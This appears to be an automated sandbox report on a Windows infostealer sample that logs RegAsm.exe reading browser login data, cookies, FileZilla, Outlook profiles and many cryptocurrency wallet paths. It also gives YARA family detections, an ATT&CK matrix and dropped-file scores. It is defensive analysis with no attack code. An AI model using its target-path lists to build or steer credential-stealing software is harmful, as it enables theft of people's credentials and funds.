Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: passphrase.json
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: \Ethereum\
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: file__0.localstorage
Source: RegAsm.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Directory queried: C:\Users\user\Documents

Source: Yara match	File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2991424929.0000000002818000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	22_2_69CC0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC0D60 sqlite3_bind_parameter_name,	22_2_69CC0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CC0C40 sqlite3_bind_zeroblob,	22_2_69CC0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE8EA0 sqlite3_clear_bindings,	22_2_69BE8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE60B0 listen,WSAGetLastError,	22_2_69BE60B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BEC030 sqlite3_bind_parameter_count,	22_2_69BEC030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE6070 PR_Listen,	22_2_69BE6070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BEC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	22_2_69BEC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE63C0 PR_Bind,	22_2_69BE63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69B722D0 sqlite3_bind_blob,	22_2_69B722D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69BE6410 bind,WSAGetLastError,	22_2_69BE6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	231 Windows Management Instrumentation	1 Scripting	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	21 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	511 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	NTDS	468 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	21 Registry Run Keys / Startup Folder	1 Install Root Certificate	LSA Secrets	1091 Security Software Discovery	SSH	1 Credential API Hooking	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	581 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	581 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	511 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FileApp.exe	24%	ReversingLabs	ByteCode-MSIL.Trojan.StealerC

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\jewkkwnf\jewkkwnf.exe	67%	ReversingLabs	Win32.Trojan.Privateloader
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	88%	ReversingLabs	Win64.Trojan.Casdet
C:\Users\userEHJKFCGHID.exe	67%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\userFBKKJEBFID.exe	55%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	67%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe	88%	ReversingLabs	Win64.Trojan.Casdet
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe	16%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe	34%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe	55%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe	55%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe	67%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe	50%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe	75%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe	67%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe	67%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	88%	ReversingLabs	Win64.Trojan.Casdet
C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	67%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	55%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Privateloader
C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	16%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	34%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	50%	ReversingLabs	Win32.Spyware.Lummastealer
